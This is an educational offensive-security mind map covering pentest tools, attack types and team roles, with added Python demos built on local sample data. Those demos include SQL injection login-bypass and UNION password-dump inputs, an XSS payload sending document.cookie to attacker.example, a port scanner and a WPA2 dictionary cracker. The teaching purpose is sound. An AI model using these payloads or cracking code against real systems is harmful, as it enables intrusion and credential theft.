Offensive Security - Coggle Diagram
Offensive Security
Offensive Tools
Kali Linux:
A Debian-based Linux distribution that comes pre-installed with many of the tools used for penetration testing; the same toolset can equally be used for unauthorised hacking.
Burp Suite:
A web-application testing tool. It sits as an intercepting proxy between the browser and the target site, so the tester can view and modify HTTP(S) requests and responses, scan the site for vulnerabilities, and automate attacks (such as fuzzing parameters or guessing login credentials) for exploitation.
Wireshark:
A packet capture and protocol analyser. It captures network traffic and decodes it protocol by protocol, which helps find security issues in network communications, such as credentials or other sensitive data sent in cleartext.
Aircrack-ng:
A suite of wireless tools. It can put a Wi-Fi interface into monitor mode to sniff packets, capture the WPA/WPA2 four-way handshake between a client and an access point, and then recover the network passphrase offline by running a dictionary attack against that captured handshake (it can also recover WEP keys).
Offensive threats
DoS attack:
A Denial of Service attack takes a server or service offline by overloading it with more requests or traffic than it can handle. In the distributed form (DDoS), the attacker first compromises many other computers and assembles them into a botnet; every machine in the botnet then sends requests to the target as fast as it can. The combined load exhausts the server's bandwidth, connection table or processing capacity, so legitimate users can no longer reach it or the system crashes outright.
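One thing a defender wants from the description above is a way to spot a flood in the server's own logs. The following is an added example, not part of the original diagram: a sliding-window counter over constructed Common Log Format lines that flags any source sending more than a threshold of requests inside one second (the IP addresses, timestamps and threshold are all made up for the demonstration).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common Log Format: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (source_ip, timestamp) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def detect_floods(lines, threshold=50, window_seconds=1):
    """Flag sources that send more than `threshold` requests inside any
    `window_seconds`-long sliding window.  Lines are assumed to be in
    chronological order for each source (as a web server writes them).
    Returns {ip: peak_requests_seen_in_one_window}."""
    recent = defaultdict(deque)   # per-source timestamps inside the current window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts = parsed
        window = recent[ip]
        window.append(ts)
        # drop timestamps that have fallen out of the window
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > threshold and len(window) > peaks.get(ip, 0):
            peaks[ip] = len(window)
    return peaks


def build_sample_log():
    """Constructed sample (not real traffic): one source fires 120 GETs within
    about a second while a second source browses normally."""
    lines = []
    for i in range(120):
        second = 36 + i // 100              # first 100 at :36, the rest at :37
        lines.append(
            f'203.0.113.7 - - [10/Oct/2023:13:55:{second} +0000] "GET / HTTP/1.1" 200 612'
        )
    for second, path in ((36, "/"), (37, "/about"), (38, "/contact")):
        lines.append(
            f'198.51.100.4 - - [10/Oct/2023:13:55:{second} +0000] "GET {path} HTTP/1.1" 200 1024'
        )
    return lines


if __name__ == "__main__":
    for ip, peak in detect_floods(build_sample_log()).items():
        print(f"possible flood from {ip}: {peak} requests in one 1s window")
```

A per-source counter like this only catches a single-source DoS; against a botnet each address may stay under the threshold, which is why DDoS detection usually aggregates by destination (total request rate per URL or per server) as well as by source.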
SQL injection:
This attack applies to any application that builds SQL queries from user input, for example a website that connects to an SQL database. If the application concatenates the input directly into the query text, an attacker can supply input containing SQL syntax of their own, and the database executes it as part of the query. This lets the attacker make the database return sensitive information the application would normally never display (other users' records, password hashes), bypass logins, or modify data.
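To make the mechanism concrete, here is an added example (not from the original diagram) using Python's built-in sqlite3 module: a login and a search feature written with string concatenation beside their parameterised equivalents, attacked with the same inputs. The users table, its two rows and the attack strings are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory database with a constructed users table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext passwords only to keep the demonstration short; real systems store hashes.
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: whatever the user types becomes SQL."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the SQL text,
    so quotes and comment markers in the input are just characters to compare."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, prefix):
    """Same flaw in a search feature; a UNION lets the attacker pull other columns."""
    query = f"SELECT username FROM users WHERE username LIKE '{prefix}%'"
    return [r[0] for r in conn.execute(query).fetchall()]


def search_safe(conn, prefix):
    query = "SELECT username FROM users WHERE username LIKE ?"
    return [r[0] for r in conn.execute(query, (prefix + "%",)).fetchall()]


# Attack inputs: the -- turns the rest of the original query into a comment.
BYPASS_USERNAME = "alice' --"                            # logs in as alice with any password
DUMP_PREFIX = "' UNION SELECT password FROM users --"    # exfiltrates every password


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login: ", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("safe login:       ", login_safe(db, BYPASS_USERNAME, "wrong"))
    print("vulnerable search:", search_vulnerable(db, DUMP_PREFIX))
    print("safe search:      ", search_safe(db, DUMP_PREFIX))
```

In the vulnerable login the query becomes `SELECT username FROM users WHERE username = 'alice' --' AND password = 'wrong'`, so the password check is commented out; in the parameterised version the same string is simply compared against the username column and matches nothing.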
Cross Site Scripting:
Cross site scripting (XSS) is an injection attack like SQL injection, but the injected code is JavaScript and it runs in a victim's browser rather than on the server. If a website places user-supplied input into its pages without escaping it, an attacker can insert script into that input (for example through a crafted link or a stored comment). When another user views the page, their browser runs the script as though it were part of the site, which lets the attacker steal session cookies, read data from the page, or perform actions as that user.
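The server-side half of the attack is easy to show. The following is an added example, not part of the original diagram: two page fragments rendered from user input, first by pasting the input in as-is and then after HTML-escaping it with Python's html.escape. The templates and payloads are constructed, and attacker.example is a placeholder host; the point of the second pair is that escaping without quote handling is still exploitable inside an attribute value.

```python
from html import escape

# A page that reflects the user's search term back at them (element context).
PAGE_TEMPLATE = "<html><body><h1>Results for: {query}</h1></body></html>"
# A form field pre-filled with the user's input (attribute context).
ATTR_TEMPLATE = '<input type="text" name="q" value="{query}">'


def render_vulnerable(query):
    """Untrusted input pasted into HTML as-is: any tags in it become part of the page."""
    return PAGE_TEMPLATE.format(query=query)


def render_safe(query):
    """Escaping turns < > & " ' into entities, so the browser shows the text literally."""
    return PAGE_TEMPLATE.format(query=escape(query, quote=True))


def render_attr_weak(query):
    """Escapes < > & but not quotes, which is not enough inside an attribute value:
    a double quote in the input closes the attribute and the rest becomes new attributes."""
    return ATTR_TEMPLATE.format(query=escape(query, quote=False))


def render_attr_safe(query):
    """Quote-aware escaping keeps the input inside the attribute value."""
    return ATTR_TEMPLATE.format(query=escape(query, quote=True))


# Constructed attack inputs.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD))
    print(render_safe(SCRIPT_PAYLOAD))
    print(render_attr_weak(ATTR_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

render_attr_weak produces `<input type="text" name="q" value="" autofocus onfocus="alert(document.domain)">`, which a browser treats as a focused input with an event handler, even though no `<` or `>` was ever injected; which escaping is sufficient depends on where in the HTML the input lands.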
Social Engineering:
Rather than attacking the technology, this method manipulates people. Attackers gather information about the target and then use phishing, baiting, pretexting or similar tactics to trick victims into revealing credentials, running malware, or otherwise letting the attacker into the system.
Teams
Red Teaming
A form of security testing in which a team of security experts uses the tactics, techniques and procedures (TTPs) of real attackers to simulate an attack against the organisation without causing any real damage. After the exercise is finished, the resulting breaches and vulnerabilities are shared with the blue team (the defenders) to be resolved.
Purple Teaming
Purple teaming is a mix of red and blue teaming in which both teams cooperate: the red team attacks while the blue team defends, and security gaps are fixed as they are discovered, which allows for faster improvement of the organisation's security.
It is iterative in nature: after the red team carries out an attack and the data is gathered, both teams review what the defences detected and what they missed, and the blue team resolves those issues before the next round.
Pen-Testing
Process
In a black-box test, pen testers have no information about the target system. They must rely on their own research to develop an attack plan, as a real-world hacker would.
In a white-box test, pen testers have total transparency into the target system. The company shares details like network diagrams, source code, credentials, and more.
In a gray-box test, pen testers get some information but not much. For example, the company might share IP ranges for network devices, but the pen testers have to probe those IP ranges for vulnerabilities on their own.
The testing team gathers information on the target system. Pen testers use different recon methods depending on the target. For example, if the target is an app, pen testers might study its source code. If the target is an entire network, pen testers might use a packet analyzer to inspect network traffic flows.
Pen testers often draw on open source intelligence (OSINT) as well. By reading public documentation, news articles, and even employees' social media and GitHub accounts, pen testers can glean valuable information about their targets.
Pen testers use the knowledge that they gained in the recon step to identify exploitable vulnerabilities in the system. For example, pen testers might use a port scanner like Nmap to find open ports and the services listening on them; those services, and any outdated versions among them, become candidate targets for exploitation. For a social engineering pen test, the testing team might develop a fake story, or "pretext," they use in a phishing email to steal employee credentials.
As part of this step, pen testers may check how security features react to intrusions. For example, they might send suspicious traffic to the company's firewall to see what happens. Pen testers will use what they learn to avoid detection during the rest of the test.
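The port-scanning step above reduces to a simple idea: try to complete a TCP handshake on each port and see which ones accept. The following is an added example, not part of the original diagram or of Nmap: a minimal TCP connect scan written with Python's socket module, run against a throwaway listener on the loopback interface so it works offline (the listener, the port range and the timeout value are assumptions for the demonstration).

```python
import socket
from contextlib import closing


def start_local_listener():
    """Stand-in target: a TCP service listening on an ephemeral loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0 lets the OS pick a free port
    srv.listen(5)
    return srv, srv.getsockname()[1]


def scan_ports(host, ports, timeout=0.2):
    """TCP connect scan (what Nmap calls -sT): complete the three-way handshake
    and report the port as open if the connection was accepted.  A refused
    connection means closed; a timeout usually means a firewall dropped the SYN."""
    open_ports = []
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 = connected, otherwise an errno
                open_ports.append(port)
    return open_ports


def demo():
    """Start a listener, scan the ports around it, then scan again after it closes."""
    srv, port = start_local_listener()
    try:
        found_while_up = scan_ports("127.0.0.1", range(port - 2, port + 3))
    finally:
        srv.close()
    found_after_close = scan_ports("127.0.0.1", [port])
    return {
        "listener_port": port,
        "open_while_up": found_while_up,
        "open_after_close": found_after_close,
    }


if __name__ == "__main__":
    print(demo())
```

A connect scan is the noisiest option because every open port sees a full connection in its logs; that is why the next step in the text, checking how the firewall and monitoring react, matters before scanning a whole range.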
The testing team begins the actual attack. Pen testers may try a variety of attacks depending on the target system, the vulnerabilities they found, and the scope of the test. Some of the most commonly tested attacks include:
SQL injections: Pen testers try to get a webpage or app to disclose sensitive data by entering input containing SQL syntax into fields that are concatenated into database queries.
Denial-of-service attacks: Pen testers try to take servers, apps, and other network resources offline by flooding them with traffic.
Social engineering: Pen testers use phishing, baiting, pretexting, or other tactics to trick employees into compromising network security.
Brute force attacks: Pen testers try to break into a system by running scripts that generate and test potential passwords until one works.
Man-in-the-middle attacks: Pen testers intercept traffic between two devices or users to steal sensitive information or plant malware.
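The brute force entry above and the Aircrack-ng entry under Offensive Tools describe the same technique: generate candidate passwords and test each one. The following is an added example, not part of the original diagram or of aircrack-ng, that runs a dictionary attack against a WPA2-Personal key. The passphrase-to-PMK derivation (PBKDF2-HMAC-SHA1 salted with the SSID, 4096 iterations) is the standard one from IEEE 802.11i; aircrack-ng checks each guess against the MIC in the captured four-way handshake, which this example replaces with a direct comparison against a known PMK so it runs offline. The SSID, wordlist, suffixes and target passphrase are constructed.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256-bit output (IEEE 802.11i).
    The iteration count is what makes each guess cost thousands of SHA-1 operations."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def candidates(base_words, suffixes=("", "1", "123", "!", "2023")):
    """Generate-and-test: expand a small wordlist with common suffixes (constructed rules)."""
    for word in base_words:
        for suffix in suffixes:
            yield word + suffix


def dictionary_attack(target_pmk, ssid, wordlist):
    """Try each candidate passphrase in order.
    Returns (passphrase, guesses_made) on success or (None, guesses_made) if exhausted."""
    guesses = 0
    for guess in wordlist:
        guesses += 1
        if hmac.compare_digest(wpa2_pmk(guess, ssid), target_pmk):
            return guess, guesses
    return None, guesses


# Constructed scenario: the SSID comes from the captured beacon/handshake, the PMK
# stands in for the handshake check, and the passphrase is one a victim might pick.
SSID = "HomeNet"
BASE_WORDS = ["password", "homenet", "sunflower", "letmein"]
WEAK_PMK = wpa2_pmk("sunflower123", SSID)
STRONG_PMK = wpa2_pmk("correct horse battery staple", SSID)


if __name__ == "__main__":
    print("weak:  ", dictionary_attack(WEAK_PMK, SSID, candidates(BASE_WORDS)))
    print("strong:", dictionary_attack(STRONG_PMK, SSID, candidates(BASE_WORDS)))
```

Because the SSID is the salt, a PMK computed for one network name cannot be reused against another, which is why precomputed WPA tables are built per common SSID; and because each guess costs 4096 HMAC rounds, the attack's feasibility depends entirely on how far down the wordlist the real passphrase sits.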
Types
Application pen testing:
Application pen tests look for vulnerabilities in apps and related systems, including web applications and websites, mobile and IoT apps, cloud apps, and application programming interfaces (APIs).
Network pen testing:
Network pen tests attack the company's entire computer network. There are two broad types of network pen tests: external tests and internal tests. An external test is when pen testers mimic the behavior of external hackers to find security issues in internet-facing assets like servers, routers, websites, and employee computers. These are called “external tests” because pen testers try to break into the network from the outside. An internal test is when pen testers mimic the behavior of malicious insiders or hackers with stolen credentials. The goal is to uncover vulnerabilities a person might exploit from inside the network; for example, abusing access privileges to steal sensitive data.
Hardware pen testing:
These security tests look for vulnerabilities in devices connected to the network, such as laptops, mobile and IoT devices, and operational technology (OT). Pen testers may look for software flaws, like an operating system exploit that allows hackers to gain remote access to an endpoint. They may look for physical vulnerabilities, like an improperly secured data center that malicious actors might slip into.
Personnel pen testing:
These security tests assess how vulnerable a company is to social engineering attacks. Personnel pen testers use phishing, vishing (voice phishing), and smishing (SMS phishing) to trick employees into giving up sensitive information. Personnel pen tests may also evaluate physical office security. For example, pen testers might try to get into a building by posing as delivery staff, or by following an authorised employee through a secured door without badging in; the latter technique, called "tailgating," is commonly used by real-world criminals.